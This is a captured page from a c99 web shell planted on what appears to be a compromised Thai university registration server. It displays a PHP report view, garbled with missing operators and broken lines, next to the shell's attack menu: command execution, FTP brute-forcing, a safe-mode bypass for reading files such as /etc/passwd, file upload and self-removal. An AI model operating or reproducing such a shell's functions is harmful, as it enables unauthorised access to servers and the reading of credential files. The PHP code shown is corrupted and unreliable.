!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/eregis-13022565/   drwxrwxrwx
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_rptRis109.php (5.28 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<table width="100%" align="center">
    <tr>
        <td>
            <div align="center"><br>
            <?php echo form_open($this->config->item("rg_folder")."rpt_regis/showRptRis106", array("name" => "myform""id" => "myform"));?>
            <table width="100%">
            <tr>
                <td align="center"><font class="h">รายวิชาที่สอน</font></td>
            </tr>
            <tr>
                <td><br /></td>
            </tr>
            <tr>
                <td>
                <table class="szone">
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td width="100" height="22"><font size="2" ><strong>ปีการศึกษา</strong></font></td>
                    <td width="250"><font size="2" ><strong>:</strong> <?php echo $acY;?></font></td>
                    <td width="100"><font size="2" ><strong>ภาคการศึกษา</strong></font></td>
                    <td width="250"><font size="2" ><strong>:</strong> <?php echo $tmId;?></font></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td height="22"><font size="2" ><strong>รหัสรายวิชา</strong></font></td>
                    <td><font size="2" ><strong>:</strong> *<?php echo $courseCode;?>*</font></td>
                    <td><font size="2" ><strong>กลุ่มเรียน</strong></font></td>
                    <td><font size="2" ><strong>:</strong> <?php echo $section;?></font></td>
                </tr>    
                <tr>
                    <td height="22" colspan="4"></td>
                </tr>
                </table>
                </td></tr>
                <tr>
                    <td colspan="4">
                    <table width="100%" class="headCol">
                        <tr bgcolor="<?=$this->config->item("rg_table_color")?>">
                            <th width="12%" height="22" align="center"><font size="2" color="<?=$font_color_table;?>"><strong>รหัสรายวิชา</strong></font></th>
                            <th width="40%" align="center"><font size="2" color="<?=$font_color_table;?>"><strong>ชื่อรายวิชา</strong></font></th>
                            <th width="38%" align="center"><font size="2" color="<?=$font_color_table;?>"><strong>ชื่ออาจารย์ผู้สอน</strong></font></th>
                            <th width="10%" align="center"><font size="2" color="<?=$font_color_table;?>"><strong>พิมพ์</strong></font></th>
                        </tr>
<?php 
                        $i 
0;
                        if(
$rs_co->num_rows()) {
                            foreach(
$rs_co->result() as $row) {        

                            
$pgNames '';  
                            if(
is_null($row->coCurId)) {
                            
                                
$k 0;
                                                    
                                
$cofCon = array('cofCoId' => $row->coId);
                                
$rs_cof $cof->qryCofJoinCur($cofCon);    
                                if(
$rs_cof->num_rows()) {
                                    foreach(
$rs_cof->result() as $row) {            
                                        if(
$k == 0)
                                            
$pgNames $row->curName;
                                        else
                                            
$pgNames .= '<br>&nbsp;'.$row->curName;
                                        
                                        
$k++;                            
                                    
                                    }
                                }                            
                            }    else {
                                
                                
$cur->curId $row->coCurId;
                                
$qu_cur $cur->get_by_key();
                                if(
$qu_cur->num_rows()) { 
                                    
$row_cur $qu_cur->row();
                                
                                    
$pgNames $row_cur->curName;
                                }
                            }

                            if((
$i%2) == 0)
                                echo 
"<tr>";
                            else
                                echo 
"<tr bgcolor=\"".$tr_color_even."\"  height=22>";
?>
                            <td height="22"><font size="2" ><?php echo (isset($row->crsCode)) ? $row->crsCode '' ;?></font></td>
                            <td><font size="2" >[<strong>กลุ่มที่ <?=$row->coSection;?></strong>]<br /><?php echo (isset($row->crsName)) ? $row->crsName '';?></font><br>
                            <font size="2" color="<?=$font_color_err;?>"><?php echo '['.$pgNames.']';?></font></td>
                            <td><font size="2" >
<?php  
                            $j 
0;
                            
$ttbCon = array('ttCoId' => ((isset($row->coId)) ? $row->coId ''));
                            
$ttbGroup = array('ttPrsId' => 'ttPrsId');
                            
$rs_tt $ttb->qryTtJoinPeopleCenter($ttbCon,'',$ttbGroup);            
                            if(
$rs_tt->num_rows() > 0) {
                                foreach(
$rs_tt->result() as $rowtt) {            
                                    if(
$j != 0) echo '<br>';
                                    echo 
$rowtt->prefixName.$rowtt->fName.' '.$rowtt->lName;                                
                                    
$j++;                
                                }
                            }                            
?>
                            </font></td>
                            <td align="center">
                            <?php
                                
echo anchor_popup($this->config->item("rg_folder")."rpt_regis/RptRis109/".((isset($row->coId)) ? $row->coId '0')."/".$acY."/".$tmId."/".((isset($row->coCurId)) ? $row->coCurId '0')."/P""<img src=\"".base_url().$this->config->item("rg_pdf")."\" width=\"18\" height=\"18\" align=\"abmiddle\" border=\"0\" height=\"ส่งออกเป็น PDF\" />", array("width" => "700""height" => "500"));
                                echo 
' | ';
                                echo 
anchor_popup($this->config->item("rg_folder")."rpt_regis/RptRis109/".((isset($row->coId)) ? $row->coId '0')."/".$acY."/".$tmId."/".((isset($row->coCurId)) ? $row->coCurId '0')."/E""<img src=\"".base_url().$this->config->item("rg_excel_exp")."\" width=\"18\" height=\"18\" align=\"abmiddle\" border=\"0\" height=\"ส่งออกเป็น Excel\" />", array("width" => "700""height" => "500"));
                            
?>
                            </td>
                        </tr>
<?php
                            $i
++;
                        }
                    }
                        
                        if(
$i == 0) {
?>
                        <tr>
                            <td colspan="4" align="center"><span class="error" >** ไม่ปรากฏรายวิชาที่สอนในฐานข้อมูล **</span></td>
                        </tr>
<?php
                        
}
?>
                    </table>                    
                    </td>
                </tr>                                                                                        
            </table>
            
        <?php echo form_close();?>
        </div>
        </td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0138 ]--